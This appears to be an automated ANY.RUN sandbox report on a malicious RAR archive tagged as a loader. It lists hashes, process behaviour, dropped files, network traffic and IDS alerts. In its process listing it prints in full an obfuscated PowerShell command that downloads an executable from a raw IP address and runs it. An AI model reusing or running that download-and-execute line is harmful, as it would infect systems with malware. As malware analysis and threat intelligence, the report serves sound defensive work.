analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

notice_0742.rar

Full analysis: https://app.any.run/tasks/f63497f2-9985-450c-8315-367821d10e93
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: June 19, 2019, 12:22:16
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
loader
Indicators:
MIME: application/x-rar
File info: RAR archive data, v5
MD5:

CAB66E0A8D80F1157406E7129ECCA5D5

SHA1:

60A5D6292439BEB5B2B6353FD9679D99F0203279

SHA256:

64F85BF6E24385B16C9945354A879A574A368CC1FEF574621695862BD56B29F5

SSDEEP:

192:dLwLFRcp6Bt21kba/upsr4R5QDaZPHEfZYW7s7dd8:dcL7c4Bt26eSsrIQmZsfygs7dd8

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Executes PowerShell scripts

      • cmd.exe (PID: 2864)
    • Application was dropped or rewritten from another process

      • 5659.exe (PID: 3428)
      • 5659.exe (PID: 2968)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 3516)
    • Loads dropped or rewritten executable

      • 5659.exe (PID: 3428)
    • Downloads executable files from IP

      • powershell.exe (PID: 3516)
  • SUSPICIOUS

    • Executes scripts

      • WinRAR.exe (PID: 2948)
    • Starts CMD.EXE for commands execution

      • WScript.exe (PID: 3700)
    • Reads Internet Cache Settings

      • powershell.exe (PID: 3516)
    • Creates files in the user directory

      • powershell.exe (PID: 3516)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 3516)
      • 5659.exe (PID: 3428)
    • Application launched itself

      • 5659.exe (PID: 3428)
  • INFO

    No info indicators.
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.rar | RAR compressed archive (v5.0) (61.5)
.rar | RAR compressed archive (gen) (38.4)
No data.
screenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
40
Monitored processes
6
Malicious processes
3
Suspicious processes
2

Behavior graph

Click at the process to see the details
start drop and start winrar.exe no specs wscript.exe no specs cmd.exe no specs powershell.exe 5659.exe 5659.exe

Process information

PID
CMD
Path
Indicators
Parent process
2948"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\notice_0742.rar"C:\Program Files\WinRAR\WinRAR.exeexplorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Version:
5.60.0
3700"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\Rar$DIb2948.45949\legal_doc_0742.js" C:\Windows\System32\WScript.exeWinRAR.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
2864"C:\Windows\System32\cmd.exe" /c powershell.exe $esPctm = 'guCm7czI';$x = new-object -comobject 'msxml2.xmlhttp';$vQH7TdhI = 'WiSjlExbi';$a = new-object -comobject 'adodb.stream';$bb4w56w = 'EfnbGJtb';$x.open('get', 'http://185.234.216.76/read.exe', 0);$T7XP2n = 'IgkPwM';$x.send();$yOYNwP = 'jyOrg';$a.open();$jEY9CVF = 'HiSAwI';$a.type = 1;$SpzYj3L = 'liyFvS';$a.write($x.responsebody);$yb2Chb = 'XgaEEy';$a.savetofile('..\5659.exe');$Blq07d = 'wbMqSPfm';$a.close();$sWTK0ecB = 'dSbI81';start-process '..\5659.exe';C:\Windows\System32\cmd.exeWScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3516powershell.exe $esPctm = 'guCm7czI';$x = new-object -comobject 'msxml2.xmlhttp';$vQH7TdhI = 'WiSjlExbi';$a = new-object -comobject 'adodb.stream';$bb4w56w = 'EfnbGJtb';$x.open('get', 'http://185.234.216.76/read.exe', 0);$T7XP2n = 'IgkPwM';$x.send();$yOYNwP = 'jyOrg';$a.open();$jEY9CVF = 'HiSAwI';$a.type = 1;$SpzYj3L = 'liyFvS';$a.write($x.responsebody);$yb2Chb = 'XgaEEy';$a.savetofile('..\5659.exe');$Blq07d = 'wbMqSPfm';$a.close();$sWTK0ecB = 'dSbI81';start-process '..\5659.exe';C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3428"C:\Users\admin\AppData\Local\5659.exe" C:\Users\admin\AppData\Local\5659.exe
powershell.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
2968"C:\Users\admin\AppData\Local\5659.exe" C:\Users\admin\AppData\Local\5659.exe
5659.exe
User:
admin
Integrity Level:
MEDIUM
Total events
1 355
Read events
1 263
Write events
0
Delete events
0

Modification events

No data
Executable files
3
Suspicious files
3
Text files
1
Unknown types
0

Dropped files

PID
Process
Filename
Type
3516powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\N42VK47F6QQQE4J3M7L2.temp
MD5:
SHA256:
2948WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DIb2948.45949\legal_doc_0742.jstext
MD5:8A82D20AD65C89CAC3AF9AC0A8D09CA0
SHA256:B1DC2EC6903AE40D4213ED93C5AC3255B5064550A85E070C0B9C547221739409
3516powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:5F9A7BF5388376D94C2EDCA422810BEC
SHA256:8B2183F4F2F735C231B1F81D46CB86CB1FB51168824DE82F3A9EA79C12CAF82C
3516powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF154b3b.TMPbinary
MD5:5F9A7BF5388376D94C2EDCA422810BEC
SHA256:8B2183F4F2F735C231B1F81D46CB86CB1FB51168824DE82F3A9EA79C12CAF82C
3516powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H6QNMHE9\read[1].exeexecutable
MD5:67BB25FDE7FB72AB522D2CF1A11806E2
SHA256:01A53738CF2BB8E310DE40AB9DFAFE4CB55DF8B04BD6E7E643AEB777B0F196F8
34285659.exeC:\Users\admin\AppData\Local\Temp\214829588binary
MD5:E66C4B2FDF66BE595EC6F163E29BD458
SHA256:F4BBDB66C442D09FF964F8626A9257500861095F018EBDE882496F61F238133E
3516powershell.exeC:\Users\admin\AppData\Local\5659.exeexecutable
MD5:67BB25FDE7FB72AB522D2CF1A11806E2
SHA256:01A53738CF2BB8E310DE40AB9DFAFE4CB55DF8B04BD6E7E643AEB777B0F196F8
34285659.exeC:\Users\admin\AppData\Local\Temp\nsp6D0C.tmp\System.dllexecutable
MD5:FBE295E5A1ACFBD0A6271898F885FE6A
SHA256:A1390A78533C47E55CC364E97AF431117126D04A7FAED49390210EA3E89DD0E1
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
13
TCP/UDP connections
19
DNS requests
2
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2968
5659.exe
GET
194.109.206.212:80
http://194.109.206.212/tor/status-vote/current/consensus
NL
malicious
2968
5659.exe
GET
209.141.41.41:80
http://209.141.41.41/tor/server/fp/53134d9637d9fbe565fa1e3af82b23cc964c56d6
US
suspicious
2968
5659.exe
GET
212.47.238.203:80
http://212.47.238.203/tor/server/fp/d1e12afda18a7b37f2cf9c05ad0cee254923e908
FR
suspicious
2968
5659.exe
GET
50.99.193.144:443
http://50.99.193.144:443/tor/server/fp/8a00ce9638bdb4686b91f1f0b229db3f8c9b8415
CA
suspicious
2968
5659.exe
GET
94.198.100.17:80
http://94.198.100.17/tor/server/fp/fd2f9b881ac640100c428df47dc9a863dc2f2536
IT
suspicious
2968
5659.exe
GET
51.38.134.189:80
http://51.38.134.189/tor/server/fp/cc4a3ae960e3617f49bf9887b79186c14cba6813
GB
malicious
2968
5659.exe
GET
23.129.64.167:80
http://23.129.64.167/tor/server/fp/57f273716c5310eeec6b945e634faee2f5f7b04d
US
suspicious
2968
5659.exe
GET
54.37.234.66:80
http://54.37.234.66/tor/server/fp/75ee3430cef7744ea1e35607881b27581eb15880
FR
suspicious
2968
5659.exe
GET
172.104.85.43:80
http://172.104.85.43/tor/server/fp/874d84382c892f3f61cc9e106bf08843de0b865a
JP
suspicious
3516
powershell.exe
GET
200
185.234.216.76:80
http://185.234.216.76/read.exe
unknown
executable
584 Kb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3516
powershell.exe
185.234.216.76:80
malicious
2968
5659.exe
23.23.243.154:443
api.ipify.org
Amazon.com, Inc.
US
malicious
2968
5659.exe
194.109.206.212:80
Xs4all Internet BV
NL
malicious
2968
5659.exe
51.15.244.99:80
Online S.a.s.
FR
unknown
2968
5659.exe
82.251.167.192:443
Free SAS
FR
suspicious
2968
5659.exe
129.6.15.28:13
time-a.nist.gov
National Bureau of Standards
US
unknown
2968
5659.exe
50.99.193.144:443
TELUS Communications Inc.
CA
suspicious
2968
5659.exe
209.141.41.41:80
FranTech Solutions
US
suspicious
2968
5659.exe
172.104.85.43:80
Linode, LLC
JP
suspicious
2968
5659.exe
95.142.161.63:80
GANDI SAS
FR
suspicious

DNS requests

Domain
IP
Reputation
api.ipify.org
  • 23.23.243.154
  • 54.243.147.226
  • 107.22.215.20
  • 23.21.121.219
  • 54.204.36.156
  • 54.235.124.112
  • 50.16.229.140
  • 54.243.198.12
shared
time-a.nist.gov
  • 129.6.15.28
whitelisted

Threats

PID
Process
Class
Message
3516
powershell.exe
A Network Trojan was detected
ET INFO Executable Download from dotted-quad Host
3516
powershell.exe
A Network Trojan was detected
ET CURRENT_EVENTS Likely Evil EXE download from dotted Quad by MSXMLHTTP M1
3516
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
3516
powershell.exe
A Network Trojan was detected
ET CURRENT_EVENTS Likely Evil EXE download from dotted Quad by MSXMLHTTP M2
3516
powershell.exe
Potentially Bad Traffic
ET INFO SUSPICIOUS Dotted Quad Host MZ Response
2968
5659.exe
Misc Attack
ET TOR Known Tor Relay/Router (Not Exit) Node Traffic group 279
2968
5659.exe
Misc activity
SUSPICIOUS [PTsecurity] ipify.org External IP Check
2968
5659.exe
Misc activity
SUSPICIOUS [PTsecurity] ipify.org External IP Check
2968
5659.exe
Misc activity
SUSPICIOUS [PTsecurity] ipify.org External IP Check
2968
5659.exe
Misc activity
SUSPICIOUS [PTsecurity] ipify.org External IP Check
1 ETPRO signatures available at the full report
No debug info